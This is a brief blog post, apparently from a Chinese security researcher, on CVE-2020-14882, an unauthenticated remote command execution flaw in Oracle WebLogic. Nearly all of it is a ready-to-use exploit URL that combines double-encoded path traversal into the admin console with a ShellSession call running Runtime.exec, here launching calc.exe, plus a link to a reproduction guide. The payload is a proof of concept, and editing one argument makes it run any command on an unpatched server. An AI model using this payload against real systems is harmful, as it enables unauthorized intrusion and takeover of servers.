ma4ter

Index | Photo | About | Friends | Archives

CVE-2020-14882 weblogic 未授权命令执行

weblogic rce
CVE-2020-14882 weblogic 未授权命令执行
Payload:

/console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27calc.exe%27);%22); 

复现文档:https://mp.weixin.qq.com/s/48VIwTkyFVXUTS78kNByhg